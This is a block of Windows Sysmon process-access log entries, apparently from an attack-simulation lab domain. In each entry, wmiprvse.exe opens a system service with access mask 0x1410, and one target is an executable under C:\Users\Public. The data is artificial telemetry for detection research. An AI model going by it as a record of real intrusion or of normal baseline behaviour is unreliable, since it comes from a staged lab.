15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024834Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024833Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024832Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024831Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024830Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024829Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024828Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024827Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024826Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024825Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024824Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024823Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024822Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024821Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024820Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024819Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024818Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024817Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024816Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024815Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 